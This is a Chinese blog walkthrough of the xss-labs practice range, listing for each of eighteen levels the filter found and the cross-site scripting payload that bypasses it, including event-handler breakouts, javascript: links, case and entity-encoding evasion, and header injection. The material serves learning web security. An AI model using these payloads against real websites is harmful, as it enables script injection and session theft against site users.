xss-labs靶场通关

第一关

输入js语句<script>alert(1)</script>

第二关

1、输入js语句<script>alert(1)</script>,发现没有完成跳转

 2、查看源代码,发现被"包括在内,闭合两边"

3、输入 "><script>alert(1)</script><"

第三关

1、输入js语句<script>alert(1)</script>尝试

2、查看源代码,大小于号和双引号被转义,但是单引号没有被转义且参数是用单引号闭合的,尝试用事件触发的形式

输入' οnfοcus='alert(1)'尝试,成功绕过,但并无显示。直接点击输入框

第四关

1、输入js语句<script>alert(1)</script>尝试

 2、查看源代码,大小于号(尖括号)已被过滤,引号没有被过滤或转义,参数采用的是双引号的闭合方式,尝试用事件触发的形式

 3、使用点击js代码输入尝试      " οnfοcus='alert(123)'

第五关

1、尝试输入<script>alert(1)</script>查看

2、查看源代码,发现script和on开头的两个关键字都被转义,大小于号和引号没有被过滤与转义。同时语句采用双引号闭合方式 

3、输入"><a href="javascript:alert(1)">click me!</a><"尝试

第六关

1、输入js语句尝试<script>alert(1)</script>

  2、查看源代码,发现一些标签被过滤

 3、使用大小写尝试绕过"><Script>alert(1)</Script><"

第七关

1、输入js语句尝试<script>alert(1)</script>

 2、查看源代码,发现script被过滤

 3、使用复写尝试绕过" oonnmouseover="alert(1)

 

第八关

1、输入js语句尝试<script>alert(1)</script>,页面没有变化

2、查看源代码,发现script被过滤,'被过滤

3、尝试使用href的伪协议    javascript:alert(1),因为script会被添加下划线,对script编码进行尝试

java&#115;&#99;&#114;&#105;&#112;&#116:alert(1)

第九关

1、输入js语句尝试<script>alert(1)</script>,页面没有变化

 2、查看源代码,发现与第九关过滤差不多,尝试用第九关代码尝试

解决参数不合法的问题。由于输入参数会赋给href,属于一个链接,因此猜测是否输入参数需要含http://才合法。输入参数为http://xxx.xxx并提交,查看源码发现现在链接是合法的

 3、输入javascript:alert('http://')       java&#115;&#99;&#114;&#105;&#112;&#116alert('http://')

第十关

 1、输入js语句尝试<script>alert(1)</script>,页面没有变化

 2、查看源代码发现大小于号被转义、双引号都被转义

 构造xss漏洞验证代码并验证。我们修改参数为?t_sort=click me!" type="button" onmouseover="alert(/xss/)

第十一关

1、输入js语句尝试<script>alert(1)</script>,页面没有变化

2、查看源代码,发现这有一个ref的变量可能是数据包里的referer ,

一共接收了三个参数,keyword与t_sort,被进行了html实体化的处理,所以尝试referer注入

 

 3、使用BP抓包进行referer注入   referer:click me!" type="button" οnmοuseοver="alert(1)

 

第十二关

1、查看源代码,查看过滤规则,发现读取了user-agent的信息,因此,可以直接判定这里很可能存在着注入点

 

2、使用BP抓包,需修改ua头进行注入

第十三关

1、查看源代码,现这里的cookie确实是存在着一个变量user,尝试cookie头注入

2、使用BP抓包,,修改cookie头

click me!" type="button" οnmοuseοver="alert(1)

第十四关

1、打开页面发现是上传图片,上传一张图片查看

2、修改EXIF信息,向其中写入脚本,上传这张图片就是处罚xss

第十五关

1、查看源代码,发现注入点ng

2、输入<script>alert(1)</script>

3、输入?src='level1.php?name=<a type="text" href="javascript:alert(1)">',点击图片就会跳转到16关

第十六关

1、输入<img src=yuan οnerrοr=alert(1)>'查看页面源代码,发现空格进行了替换

 

2、查看源代码 ,发现空格确实被替换,使用以下%0a来代替空格字符 进行rul的编码绕过

keyword=<img%0asrc=yuan%0aοnerrοr=alert(1)>

 

第十七关

1、这一关主要考查的是Flash XSS。 因此这里,我们利用其特性与闭合回路的思想进行xss注入

level17.php?arg01=a&arg02=" οnmοuseοver=alert(1)

第十八关

1、与17关原理相同

level18.php?arg01=a&arg02=" οnmοuseοver=alert(1)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值